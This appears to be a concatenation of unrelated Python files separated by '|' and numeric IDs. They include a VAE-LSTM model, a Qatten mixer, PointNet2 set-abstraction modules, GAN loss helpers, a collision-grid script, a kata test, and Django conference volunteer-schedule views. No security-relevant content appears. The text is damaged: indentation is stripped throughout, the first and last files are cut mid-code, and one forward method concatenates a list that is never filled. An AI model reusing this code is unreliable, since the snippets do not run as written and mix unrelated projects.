self.log_min_variance = float(np.log(min_variance))
self.input_channels = input_channels
self.imsize = imsize
self.imlength = self.imsize * self.imsize * self.input_channels
self.detach_vae_output = detach_vae_output
conv_args, conv_kwargs, deconv_args, deconv_kwargs = \
architecture['conv_args'], architecture['conv_kwargs'], \
architecture['deconv_args'], architecture['deconv_kwargs']
self.encoder = encoder_class(
**conv_args,
paddings=np.zeros(len(conv_args['kernel_sizes']), dtype=np.int64),
input_height=self.imsize,
input_width=self.imsize,
input_channels=self.input_channels,
init_w=init_w,
hidden_init=hidden_init,
**conv_kwargs)
self.lstm_args, self.lstm_kwargs = architecture['LSTM_args'], architecture['LSTM_kwargs']
self.lstm = nn.LSTM(**self.lstm_args, **self.lstm_kwargs)
self.lstm_num_layers = self.lstm_kwargs['num_layers']
self.lstm_hidden_size = self.lstm_args['hidden_size']
assert representation_size == self.lstm_args['input_size'], "lstm input is vae latent, \
so lstm input size should be equal to representation_size!"
self.vae_fc1 = nn.Linear(conv_args['output_size'], representation_size)
self.vae_fc2 = nn.Linear(conv_args['output_size'], representation_size)
self.vae_fc1.weight.data.uniform_(-init_w, init_w)
self.vae_fc1.bias.data.uniform_(-init_w, init_w)
self.vae_fc2.weight.data.uniform_(-init_w, init_w)
self.vae_fc2.bias.data.uniform_(-init_w, init_w)
self.lstm_fc = nn.Linear(self.lstm_hidden_size, representation_size)
self.lstm_fc.weight.data.uniform_(-init_w, init_w)
self.lstm_fc.bias.data.uniform_(-init_w, init_w)
self.decoder = decoder_class(
**deconv_args,
fc_input_size=representation_size,
init_w=init_w,
output_activation=decoder_output_activation,
paddings=np.zeros(len(deconv_args['kernel_sizes']), dtype=np.int64),
hidden_init=hidden_init,
**deconv_kwargs)
self.decoder_distribution = decoder_distribution
def from_vae_latents_to_lstm_latents(self, latents, lstm_hidden=None):
batch_size, feature_size = latents.shape
# print(latents.shape)
lstm_input = latents
lstm_input = lstm_input.view((1, batch_size, -1))
if lstm_hidden is None:
lstm_hidden = (ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size), \
ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size))
h, hidden = self.lstm(lstm_input, lstm_hidden) # [seq_len, batch_size, lstm_hidden_size]
lstm_latent = self.lstm_fc(h)
lstm_latent = lstm_latent.view((batch_size, -1))
return lstm_latent
def encode(self, input, lstm_hidden=None, return_hidden=False, return_vae_latent=False):
'''
input: [seq_len x batch x flatten_img_dim] of flattened images
lstm_hidden: [lstm_layers x batch x lstm_hidden_size]
mark: change depends on how latent distribution parameters are used
'''
seq_len, batch_size, feature_size = input.shape
# print("in lstm encode: ", seq_len, batch_size, feature_size)
input = input.reshape((-1, feature_size))
feature = self.encoder(input) # [seq_len x batch x conv_output_size]
vae_mu = self.vae_fc1(feature)
if self.log_min_variance is None:
vae_logvar = self.vae_fc2(feature)
else:
vae_logvar = self.log_min_variance + torch.abs(self.vae_fc2(feature))
# lstm_input = self.rsample((vae_mu, vae_logvar))
# if self.detach_vae_output:
# lstm_input = lstm_input.detach()
if self.detach_vae_output:
lstm_input = vae_mu.detach().clone()
else:
lstm_input = vae_mu
lstm_input = lstm_input.view((seq_len, batch_size, -1))
# if self.detach_vae_output:
# lstm_input = lstm_input.detach()
if lstm_hidden is None:
lstm_hidden = (ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size), \
ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size))
h, hidden = self.lstm(lstm_input, lstm_hidden) # [seq_len, batch_size, lstm_hidden_size]
lstm_latent = self.lstm_fc(h)
ret = (lstm_latent, ptu.ones_like(lstm_latent))
if return_vae_latent:
ret += (vae_mu, vae_logvar)
if return_hidden:
return ret, hidden
return ret #, lstm_input # [seq_len, batch_size, representation_size]
def forward(self, input, lstm_hidden=None, return_hidden=False):
"""
:param input:
:return: reconstructed input, obs_distribution_params, latent_distribution_params
mark: change to return the feature latents and the lstm latents
"""
if return_hidden:
latent_distribution_params, hidden = self.encode(input, lstm_hidden, return_hidden=True, return_vae_latent=True) # seq_len, batch_size, representation_size
else:
latent_distribution_params = self.encode(input, lstm_hidden, return_hidden=False, return_vae_latent=True)
vae_latent_distribution_params = latent_distribution_params[2:]
lstm_latent_encodings = latent_distribution_params[0]
vae_latents = self.reparameterize(vae_latent_distribution_params)
reconstructions, obs_distribution_params = self.decode(vae_latents) # [seq_len * batch_size, representation_size]
if return_hidden:
return reconstructions, obs_distribution_params, vae_latent_distribution_params, lstm_latent_encodings, hidden
return reconstructions, obs_distribution_params, vae_latent_distribution_params, lstm_latent_encodings
def reparameterize(self, latent_distribution_params):
if self.training:
return self.rsample(latent_distribution_params)
else:
return latent_distribution_params[0]
def kl_divergence(self, latent_distribution_params):
mu, logvar = latent_distribution_params
mu = mu.view((-1, self.representation_size)) # fold the possible seq_len dim
logvar = logvar.view((-1, self.representation_size))
return - 0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), dim=1).mean()
def get_encoding_from_latent_distribution_params(self, latent_distribution_params):
return latent_distribution_params[0].cpu()
def rsample(self, latent_distribution_params):
mu, logvar = latent_distribution_params
stds = (0.5 * logvar).exp()
epsilon = ptu.randn(*mu.size())
latents = epsilon * stds + mu
return latents
def decode(self, latents):
decoded = self.decoder(latents).view(-1,
self.imsize * self.imsize * self.input_channels)
if self.decoder_distribution == 'bernoulli':
return decoded, [decoded]
elif self.decoder_distribution == 'gaussian_identity_variance':
return torch.clamp(decoded, 0, 1), [torch.clamp(decoded, 0, 1),
torch.ones_like(decoded)]
else:
raise NotImplementedError('Distribution {} not supported'.format(
self.decoder_distribution))
def logprob(self, inputs, obs_distribution_params):
seq_len, batch_size, feature_size = inputs.shape
inputs = inputs.view((-1, feature_size))
if self.decoder_distribution == 'bernoulli':
inputs = inputs.narrow(start=0, length=self.imlength,
dim=1).contiguous().view(-1, self.imlength)
# obs_distribution_params[0] = obs_distribution_params[0].view((-1, feature_size))
log_prob = - F.binary_cross_entropy(
obs_distribution_params[0],
inputs,
reduction='elementwise_mean'
) * self.imlength
return log_prob
if self.decoder_distribution == 'gaussian_identity_variance':
# obs_distribution_params[0] = obs_distribution_params[0].view((-1, feature_size))
inputs = inputs.narrow(start=0, length=self.imlength,
dim=1).contiguous().view(-1, self.imlength)
log_prob = -1 * F.mse_loss(inputs, obs_distribution_params[0],
reduction='elementwise_mean')
return log_prob
else:
raise NotImplementedError('Distribution {} not supported'.format(
self.decoder_distribution))
def init_hidden(self, batch_size=1):
lstm_hidden = (ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size), \
ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size))
return lstm_hidden
|
55715
|
Friend1 = {"First_name": "Anita", "Last_name": "Sanchez", "Age": 21, "City": "Saltillo"}
Friend2 = {"First_name": "Andrea", "Last_name": "<NAME>", "Age": 21, "City": "Monclova"}
Friend3 = {"First_name": "Jorge", "Last_name": "Sanchez", "Age":20, "City": "Saltillo"}
amigos = [Friend1, Friend2, Friend3]
for i in range(0, len(amigos)):
print(amigos[i])
|
55729
|
import numpy as np
import torch as th
import torch.nn as nn
from rls.nn.mlps import MLP
from rls.nn.represent_nets import RepresentationNetwork
class QattenMixer(nn.Module):
def __init__(self,
n_agents: int,
state_spec,
rep_net_params,
agent_own_state_size: bool,
query_hidden_units: int,
query_embed_dim: int,
key_embed_dim: int,
head_hidden_units: int,
n_attention_head: int,
constrant_hidden_units: int,
is_weighted: bool = True):
super().__init__()
self.n_agents = n_agents
self.rep_net = RepresentationNetwork(obs_spec=state_spec,
rep_net_params=rep_net_params)
self.u_dim = agent_own_state_size # TODO: implement this
self.query_embed_dim = query_embed_dim
self.key_embed_dim = key_embed_dim
self.n_attention_head = n_attention_head
self.is_weighted = is_weighted
self.query_embedding_layers = nn.ModuleList()
self.key_embedding_layers = nn.ModuleList()
for i in range(self.n_attention_head):
self.query_embedding_layers.append(MLP(input_dim=self.rep_net.h_dim, hidden_units=query_hidden_units,
layer='linear', act_fn='relu', output_shape=query_embed_dim))
self.key_embedding_layers.append(
nn.Linear(self.u_dim, self.key_embed_dim))
self.scaled_product_value = np.sqrt(self.query_embed_dim)
self.head_embedding_layer = MLP(input_dim=self.rep_net.h_dim, hidden_units=head_hidden_units,
layer='linear', act_fn='relu', output_shape=n_attention_head)
self.constrant_value_layer = MLP(input_dim=self.rep_net.h_dim, hidden_units=constrant_hidden_units,
layer='linear', act_fn='relu', output_shape=1)
def forward(self, q_values, state, **kwargs):
"""
params:
q_values: [T, B, 1, N]
state: [T, B, *]
"""
time_step = q_values.shape[0] # T
batch_size = q_values.shape[1] # B
# state: [T, B, *]
state_feat, _ = self.rep_net(state, **kwargs) # [T, B, *]
us = self._get_us(state_feat) # [T, B, N, *]
q_lambda_list = []
for i in range(self.n_attention_head):
state_embedding = self.query_embedding_layers[i](
state_feat) # [T, B, *]
u_embedding = self.key_embedding_layers[i](us) # [T, B, N, *]
state_embedding = state_embedding.unsqueeze(-2) # [T, B, 1, *]
u_embedding = u_embedding.swapaxes(-1, -2) # [T, B, *, N]
raw_lambda = (state_embedding @ u_embedding) / \
self.scaled_product_value # [T, B, 1, N]
q_lambda = raw_lambda.softmax(dim=-1) # [T, B, 1, N]
q_lambda_list.append(q_lambda) # H * [T, B, 1, N]
q_lambda_list = th.cat(q_lambda_list, dim=-2) # [T, B, H, N]
q_lambda_list = q_lambda_list.swapaxes(-1, -2) # [T, B, N, H]
q_h = q_values @ q_lambda_list # [T, B, 1, H]
if self.is_weighted:
# shape: [-1, n_attention_head, 1]
w_h = th.abs(self.head_embedding_layer(state_feat)) # [T, B, H]
w_h = w_h.unsqueeze(-1) # [T, B, H, 1]
sum_q_h = q_h @ w_h # [T, B, 1, 1]
sum_q_h = sum_q_h.view(time_step, batch_size, 1) # [T, B, 1]
else:
sum_q_h = q_h.sum(-1) # [T, B, 1]
c = self.constrant_value_layer(state_feat) # [T, B, 1]
q_tot = sum_q_h + c # [T, B, 1]
return q_tot
def _get_us(self, state_feat):
time_step = state_feat.shape[0] # T
batch_size = state_feat.shape[1] # B
agent_own_state_size = self.u_dim
with th.no_grad():
us = state_feat[:, :, :agent_own_state_size * self.n_agents].view(
time_step, batch_size, self.n_agents, agent_own_state_size) # [T, B, N, *]
return us
|
55764
|
import unittest
from katas.kyu_6.which_are_in import in_array
class InArrayTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(in_array(
['live', 'arp', 'strong'],
['lively', 'alive', 'harp', 'sharp', 'armstrong']),
['arp', 'live', 'strong'])
|
55780
|
import numpy as np
import fcl
import torch
# R = np.array([[0.0, -1.0, 0.0],
# [1.0, 0.0, 0.0],
# [0.0, 0.0, 1.0]])
R = np.array([[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]])
T = np.array([1.0, 1.865, 0])
g1 = fcl.Box(1,2,3)
t1 = fcl.Transform()
o1 = fcl.CollisionObject(g1, t1)
# g2 = fcl.Cone(1,3)
g2 = fcl.Cylinder(0.01, 1000)
t2 = fcl.Transform()
o2 = fcl.CollisionObject(g2, t2)
# request = fcl.DistanceRequest(gjk_solver_type=fcl.GJKSolverType.GST_INDEP)
# result = fcl.DistanceResult()
request = fcl.CollisionRequest(enable_contact=True)
result = fcl.CollisionResult()
# ret = fcl.distance(o1, o2, request, result)
# ret = fcl.collide(o1, o2, request, result)
size = 50, 50
yy, xx = torch.meshgrid(torch.linspace(-5, 5, size[0]), torch.linspace(-5, 5, size[1]))
grid_points = torch.stack([xx, yy], axis=2).reshape((-1, 2))
grid_labels = torch.zeros_like(grid_points)[:, 0]
for i, (x, y) in enumerate(grid_points):
print(x, y)
o2.setTranslation([x, y, 0])
fcl.update()
ret = fcl.collide(o1, o2, request, result)
grid_labels[i] = result.is_collision
print(result.is_collision)
import matplotlib.pyplot as plt
plt.scatter(grid_points[grid_labels==True, 0], grid_points[grid_labels==True, 1])
plt.show()
# print(ret, result.contacts[0].penetration_depth)
|
55784
|
import torch
import torch.nn as nn
from torch import autograd
from Configs import Global_Config
def calc_Dw_loss(probs: torch.Tensor, label: int):
labels = torch.full((probs.size(0),), label, dtype=torch.float, device=Global_Config.device)
criterion = nn.BCELoss()
adversarial_loss = criterion(probs, labels)
return adversarial_loss
def R1_regulazation(r1_coefficient, probs, ws):
return (r1_coefficient / 2) * compute_grad2(probs, ws).mean()
def compute_grad2(probs, w_input):
batch_size = w_input.size(0)
grad_dout = autograd.grad(
outputs=probs.sum(), inputs=w_input,
create_graph=True, retain_graph=True, only_inputs=True
)[0]
grad_dout2 = grad_dout.pow(2)
reg = grad_dout2.view(batch_size, -1).sum(1)
return reg
|
55786
|
from typing import List
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import pointnet2_utils
class StackSAModuleMSG(nn.Module):
def __init__(self, *, radii: List[float], nsamples: List[int], mlps: List[List[int]],
use_xyz: bool = True, pool_method='max_pool'):
"""
Args:
radii: list of float, list of radii to group with
nsamples: list of int, number of samples in each ball query
mlps: list of list of int, spec of the pointnet before the global pooling for each scale
use_xyz:
pool_method: max_pool / avg_pool
"""
super().__init__()
assert len(radii) == len(nsamples) == len(mlps)
self.groupers = nn.ModuleList()
self.mlps = nn.ModuleList()
for i in range(len(radii)):
radius = radii[i]
nsample = nsamples[i]
self.groupers.append(pointnet2_utils.QueryAndGroup(radius, nsample, use_xyz=use_xyz))
mlp_spec = mlps[i]
if use_xyz:
mlp_spec[0] += 3
shared_mlps = []
for k in range(len(mlp_spec) - 1):
shared_mlps.extend([
nn.Conv2d(mlp_spec[k], mlp_spec[k + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp_spec[k + 1]),
nn.ReLU()
])
self.mlps.append(nn.Sequential(*shared_mlps))
self.pool_method = pool_method
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0)
def forward(self, xyz, xyz_batch_cnt, new_xyz, new_xyz_batch_cnt, features=None, empty_voxel_set_zeros=True):
"""
:param xyz: (N1 + N2 ..., 3) tensor of the xyz coordinates of the features
:param xyz_batch_cnt: (batch_size), [N1, N2, ...]
:param new_xyz: (M1 + M2 ..., 3)
:param new_xyz_batch_cnt: (batch_size), [M1, M2, ...]
:param features: (N1 + N2 ..., C) tensor of the descriptors of the the features
:return:
new_xyz: (M1 + M2 ..., 3) tensor of the new features' xyz
new_features: (M1 + M2 ..., \sum_k(mlps[k][-1])) tensor of the new_features descriptors
"""
new_features_list = []
for k in range(len(self.groupers)):
new_features, ball_idxs = self.groupers[k](
xyz, xyz_batch_cnt, new_xyz, new_xyz_batch_cnt, features
) # (M1 + M2, C, nsample)
new_features = new_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M1 + M2 ..., nsample)
new_features = self.mlps[k](new_features) # (1, C, M1 + M2 ..., nsample)
if self.pool_method == 'max_pool':
new_features = F.max_pool2d(
new_features, kernel_size=[1, new_features.size(3)]
).squeeze(dim=-1) # (1, C, M1 + M2 ...)
elif self.pool_method == 'avg_pool':
new_features = F.avg_pool2d(
new_features, kernel_size=[1, new_features.size(3)]
).squeeze(dim=-1) # (1, C, M1 + M2 ...)
else:
raise NotImplementedError
new_features = new_features.squeeze(dim=0).permute(1, 0) # (M1 + M2 ..., C)
new_features_list.append(new_features)
new_features = torch.cat(new_features_list, dim=1) # (M1 + M2 ..., C)
return new_xyz, new_features
class StackSAModulePyramid(nn.Module):
def __init__(self, *, mlps: List[List[int]], nsamples, use_xyz: bool = True, pool_method='max_pool'):
"""
Args:
nsamples: list of int, number of samples in each ball query
mlps: list of list of int, spec of the pointnet before the global pooling for each scale
use_xyz:
pool_method: max_pool / avg_pool
"""
super().__init__()
self.num_pyramid_levels = len(nsamples)
assert len(nsamples) == len(mlps)
self.groupers = nn.ModuleList()
self.mlps = nn.ModuleList()
for i in range(self.num_pyramid_levels):
nsample = nsamples[i]
self.groupers.append(pointnet2_utils.QueryAndGroupPyramid(nsample, use_xyz=use_xyz))
mlp_spec = mlps[i]
if use_xyz:
mlp_spec[0] += 3
shared_mlps = []
for k in range(len(mlp_spec) - 1):
shared_mlps.extend([
nn.Conv2d(mlp_spec[k], mlp_spec[k + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp_spec[k + 1]),
nn.ReLU()
])
self.mlps.append(nn.Sequential(*shared_mlps))
self.pool_method = pool_method
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0)
def forward(self, xyz, xyz_batch_cnt, new_xyz_list, new_xyz_r_list, new_xyz_batch_cnt_list, features=None, batch_size=None, num_rois=None):
"""
:param xyz: (N1 + N2 ..., 3) tensor of the xyz coordinates of the features
:param xyz_batch_cnt: (batch_size), [N1, N2, ...]
:param new_xyz_list: [(B, N x grid_size^3, 3)]
:param new_xyz_r_list: [(B, N x grid_size^3, 1)]
:param new_xyz_batch_cnt_list: (batch_size)
:param features: (N1 + N2 ..., C) tensor of the descriptors of the the features
:return:
new_xyz: (M1 + M2 ..., 3) tensor of the new features' xyz
new_features: (M1 + M2 ..., \sum_k(mlps[k][-1])) tensor of the new_features descriptors
"""
new_features_list = []
for i in range(self.num_pyramid_levels):
new_xyz = new_xyz_list[i]
new_xyz_r = new_xyz_r_list[i]
new_xyz_batch_cnt = new_xyz_batch_cnt_list[i]
new_xyz = new_xyz.view(-1, 3).contiguous()
new_xyz_r = new_xyz_r.view(-1, 1).contiguous()
new_features, _ = self.groupers[i](
xyz, xyz_batch_cnt, new_xyz, new_xyz_r, new_xyz_batch_cnt, features
)
new_features = new_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M1 + M2 ..., nsample)
new_features = self.mlps[i](new_features) # (1, C, M1 + M2 ..., nsample)
new_features = F.max_pool2d(
new_features, kernel_size=[1, new_features.size(3)]
).squeeze(dim=-1) # (1, C, M1 + M2 ...)
new_features = new_features.squeeze(dim=0).permute(1, 0) # (M1 + M2 ..., C)
num_features = new_features.shape[1]
new_features = new_features.view(batch_size * num_rois, -1, num_features)
new_features_list.append(new_features)
new_features = torch.cat(new_features_list, dim=1) # (B x N, \sum(grid_size^3), C)
return new_features
class StackSAModuleMSGDeform(nn.Module):
"""
Set abstraction with single radius prediction for each roi
"""
def __init__(self, *, temperatures: List[float], div_coefs: List[float], radii: List[float],
nsamples: List[int], predict_nsamples: List[int],
mlps: List[List[int]], pmlps: List[List[int]], pfcs: List[List[int]],
grid_size: int, use_xyz: bool = True):
"""
:param radii: list of float, list of radii to group with
:param nsamples: list of int, number of samples in each ball query
:param mlps: list of list of int, spec of the pointnet before the global pooling for each scale
:param use_xyz:
:param pool_method: max_pool / avg_pool
"""
super().__init__()
assert len(radii) == len(nsamples) == len(mlps)
self.grid_size = grid_size
self.MIN_R = 0.01
self.radii_list = radii
self.div_coef_list = div_coefs
self.norm_groupers = nn.ModuleList()
self.deform_groupers = nn.ModuleList()
self.feat_mlps = nn.ModuleList()
self.predict_mlps = nn.ModuleList()
self.predict_fcs = nn.ModuleList()
for i in range(len(radii)):
radius = radii[i]
nsample = nsamples[i]
predict_nsample = predict_nsamples[i]
temperature = temperatures[i]
self.norm_groupers.append(
pointnet2_utils.QueryAndGroup(radius, predict_nsample, use_xyz=use_xyz)
)
self.deform_groupers.append(
pointnet2_utils.QueryAndGroupDeform(temperature, nsample, use_xyz=use_xyz)
)
mlp_spec = mlps[i]
predict_mlp_spec = pmlps[i]
if use_xyz:
mlp_spec[0] += 3
predict_mlp_spec[0] += 3
self.feat_mlps.append(self._make_mlp_layer(mlp_spec))
self.predict_mlps.append(self._make_mlp_layer(predict_mlp_spec))
fc_spec = pfcs[i]
self.predict_fcs.append(self._make_fc_layer(fc_spec))
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.Linear):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
def _make_mlp_layer(self, mlp_spec):
mlps = []
for i in range(len(mlp_spec) - 1):
mlps.extend([
nn.Conv2d(mlp_spec[i], mlp_spec[i + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp_spec[i + 1]),
nn.ReLU()
])
return nn.Sequential(*mlps)
def _make_fc_layer(self, fc_spec):
assert len(fc_spec) == 2
return nn.Linear(fc_spec[0], fc_spec[1], bias = True)
def forward(self, xyz, xyz_batch_cnt, rois, roi_features, features=None, temperature_decay=None):
"""
:param xyz: (N1 + N2 ..., 3) tensor of the xyz coordinates of the features
:param xyz_batch_cnt: (batch_size), [N1, N2, ...]
:param rois: (B, num_rois, grid_size^3, 3) roi grid points
:param roi_features: (B, num_rois, C) roi features
:param features: (N1 + N2 ..., C) tensor of the descriptors of the the features
:return:
new_xyz: (M1 + M2 ..., 3) tensor of the new features' xyz
new_features: (M1 + M2 ..., \sum_k(mlps[k][-1])) tensor of the new_features descriptors
"""
batch_size = rois.shape[0]
num_rois = rois.shape[1]
new_xyz = rois.view(batch_size, -1, 3).contiguous()
new_xyz_batch_cnt = new_xyz.new_full((batch_size), new_xyz.shape[1]).int()
new_xyz = new_xyz.view(-1, 3).contiguous()
new_features_list = []
for k in range(len(self.norm_groupers)):
# radius prediction
predicted_features, ball_idxs = self.norm_groupers[k](
xyz, xyz_batch_cnt, new_xyz, new_xyz_batch_cnt, features
) # (M, C, nsample)
predicted_features = predicted_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M, nsample)
predicted_features = self.predict_mlps[k](predicted_features) # (1, C, M, nsample)
predicted_features = F.max_pool2d(
predicted_features, kernel_size=[1, predicted_features.size(3)]
).squeeze(dim=-1) # (1, C, M)
# M = batch_size * num_rois * grid_size^3
predicted_features = predicted_features.squeeze(0).permute(0, 1).contiguous() # (M, C)
num_predicted_features = predicted_features.shape[1]
predicted_features = predicted_features.view(batch_size, num_rois, self.grid_size ** 3, num_predicted_features)
predicted_features = predicted_features.view(batch_size, num_rois, -1).contiguous()
predicted_residual_r = self.predict_fcs[k](torch.cat([predicted_features, roi_features], dim = 2)) # (batch_size, num_rois, C -> 1)
new_xyz_r = predicted_residual_r / self.div_coef_list[k] + self.radii_list[k]
# constrain predicted radius above MIN_R
new_xyz_r = torch.clamp(new_xyz_r, min = self.MIN_R)
new_xyz_r = new_xyz_r.unsqueeze(2).repeat(1, 1, self.grid_size ** 3, 1) # (batch_size, num_rois, grid_size^3, 1)
new_xyz_r = new_xyz_r.view(-1, 1).contiguous()
# feature extraction
# new_features (M, C, nsample) weights (M, nsample)
new_features, new_weights, ball_idxs = self.deform_groupers[k](
xyz, xyz_batch_cnt, new_xyz, new_xyz_r, new_xyz_batch_cnt, features, temperature_decay
)
new_features = new_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M, nsample)
new_features = self.feat_mlps[k](new_features) # (1, C, M, nsample)
# multiply after mlps
new_weights = new_weights.unsqueeze(0).unsqueeze(0) # (1, 1, M, nsample)
new_features = new_weights * new_features
new_features = F.max_pool2d(
new_features, kernel_size=[1, new_features.size(3)]
).squeeze(dim=-1) # (1, C, M1 + M2 ...)
new_features = torch.cat(new_features_list, dim=1) # (M1 + M2 ..., C)
return new_xyz, new_features
class StackPointnetFPModule(nn.Module):
def __init__(self, *, mlp: List[int]):
"""
Args:
mlp: list of int
"""
super().__init__()
shared_mlps = []
for k in range(len(mlp) - 1):
shared_mlps.extend([
nn.Conv2d(mlp[k], mlp[k + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp[k + 1]),
nn.ReLU()
])
self.mlp = nn.Sequential(*shared_mlps)
def forward(self, unknown, unknown_batch_cnt, known, known_batch_cnt, unknown_feats=None, known_feats=None):
"""
Args:
unknown: (N1 + N2 ..., 3)
known: (M1 + M2 ..., 3)
unknow_feats: (N1 + N2 ..., C1)
known_feats: (M1 + M2 ..., C2)
Returns:
new_features: (N1 + N2 ..., C_out)
"""
dist, idx = pointnet2_utils.three_nn(unknown, unknown_batch_cnt, known, known_batch_cnt)
dist_recip = 1.0 / (dist + 1e-8)
norm = torch.sum(dist_recip, dim=-1, keepdim=True)
weight = dist_recip / norm
interpolated_feats = pointnet2_utils.three_interpolate(known_feats, idx, weight)
if unknown_feats is not None:
new_features = torch.cat([interpolated_feats, unknown_feats], dim=1) # (N1 + N2 ..., C2 + C1)
else:
new_features = interpolated_feats
new_features = new_features.permute(1, 0)[None, :, :, None] # (1, C, N1 + N2 ..., 1)
new_features = self.mlp(new_features)
new_features = new_features.squeeze(dim=0).squeeze(dim=-1).permute(1, 0) # (N1 + N2 ..., C)
return new_features
|
55796
|
from . import _compressor
from . import bzip2
from . import gzip
from . import lzma
from . import zlib
|
55809
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404
from django.core.exceptions import PermissionDenied
from django.db import transaction
from django.db.models import Count, Sum, F, Func
from datetime import datetime
import json
from postgresqleu.util.db import exec_to_dict
from postgresqleu.util.request import get_int_or_error
from .models import ConferenceRegistration
from .models import VolunteerSlot, VolunteerAssignment
from .util import send_conference_notification_template, get_conference_or_404
def _check_admin(request, conference):
if request.user.is_superuser:
return True
else:
return conference.administrators.filter(pk=request.user.id).exists() or conference.series.administrators.filter(pk=request.user.id).exists()
def _get_conference_and_reg(request, urlname):
conference = get_conference_or_404(urlname)
is_admin = _check_admin(request, conference)
if is_admin:
reg = ConferenceRegistration.objects.get(conference=conference, attendee=request.user)
else:
try:
reg = conference.volunteers.get(attendee=request.user)
except ConferenceRegistration.DoesNotExist:
raise Http404("Volunteer entry not found")
return (conference, is_admin, reg)
def send_volunteer_notification(conference, assignment, subject, template):
if not conference.notifyvolunteerstatus:
return
# No filter aggregates in our version of Django, so direct SQL it is
pending = exec_to_dict("SELECT count(*) FILTER (WHERE NOT org_confirmed) AS admin, count(*) FILTER (WHERE NOT vol_confirmed) AS volunteer FROM confreg_volunteerassignment a INNER JOIN confreg_volunteerslot s ON s.id=a.slot_id WHERE s.conference_id=%(confid)s", {
'confid': conference.id,
})[0]
send_conference_notification_template(
conference,
subject,
'confreg/mail/{}'.format(template), {
'conference': conference,
'assignment': assignment,
'pending': pending,
},
)
def _get_volunteer_stats(conference):
stats = ConferenceRegistration.objects.filter(conference=conference) \
.filter(volunteers_set=conference) \
.annotate(num_assignments=Count('volunteerassignment')) \
.annotate(total_time=Sum(Func(
Func(F('volunteerassignment__slot__timerange'), function='upper'),
Func(F('volunteerassignment__slot__timerange'), function='lower'),
function='age'))) \
.order_by('lastname', 'firstname')
return [{
'name': r.fullname,
'count': r.num_assignments,
'time': str(r.total_time or '0:00:00'),
} for r in stats]
def _slot_return_data(slot):
return {
'id': slot.id,
'max_staff': slot.max_staff,
'min_staff': slot.min_staff,
'assignments': [{
'id': a.id,
'volid': a.reg.id,
'volunteer': a.reg.fullname,
'vol_confirmed': a.vol_confirmed,
'org_confirmed': a.org_confirmed,
} for a in slot.volunteerassignment_set.all()],
}
@login_required
@transaction.atomic
def volunteerschedule_api(request, urlname, adm=False):
try:
(conference, can_admin, reg) = _get_conference_and_reg(request, urlname)
except ConferenceRegistration.DoesNotExist:
raise PermissionDenied()
is_admin = can_admin and adm
if request.method == 'GET':
# GET just always returns the complete volunteer schedule
slots = VolunteerSlot.objects.prefetch_related('volunteerassignment_set', 'volunteerassignment_set__reg').filter(conference=conference)
return HttpResponse(json.dumps({
'slots': [_slot_return_data(slot) for slot in slots],
'volunteers': [{
'id': vol.id,
'name': vol.fullname,
} for vol in conference.volunteers.all().order_by('firstname', 'lastname')],
'meta': {
'isadmin': is_admin,
'regid': reg.id,
},
'stats': _get_volunteer_stats(conference),
}), content_type='application/json')
if request.method != 'POST':
raise Http404()
if 'op' not in request.POST:
raise Http404()
slotid = get_int_or_error(request.POST, 'slotid')
volid = get_int_or_error(request.POST, 'volid')
# We should always have a valid slot
slot = get_object_or_404(VolunteerSlot, conference=conference, pk=slotid)
err = None
if request.POST['op'] == 'signup':
if volid != 0:
raise PermissionDenied("Invalid post data")
err = _signup(request, conference, reg, is_admin, slot)
elif request.POST['op'] == 'remove':
err = _remove(request, conference, reg, is_admin, slot, volid)
elif request.POST['op'] == 'confirm':
err = _confirm(request, conference, reg, is_admin, slot, volid)
elif request.POST['op'] == 'add':
err = _add(request, conference, reg, is_admin, slot, volid)
else:
raise Http404()
if err:
return HttpResponse(
json.dumps({'err': err}),
content_type='application/json',
status=500,
)
# Req-query the database to pick up any changes, and return the complete object
slot = VolunteerSlot.objects.prefetch_related('volunteerassignment_set', 'volunteerassignment_set__reg').filter(conference=conference, pk=slot.pk)[0]
return HttpResponse(json.dumps({
'err': None,
'slot': _slot_return_data(slot),
'stats': _get_volunteer_stats(conference),
}), content_type='application/json')
@login_required
def volunteerschedule(request, urlname, adm=False):
try:
(conference, can_admin, reg) = _get_conference_and_reg(request, urlname)
except ConferenceRegistration.DoesNotExist:
return HttpResponse("Must be registered for conference to view volunteer schedule")
is_admin = can_admin and adm
slots = VolunteerSlot.objects.filter(conference=conference).order_by('timerange', 'title')
return render(request, 'confreg/volunteer_schedule.html', {
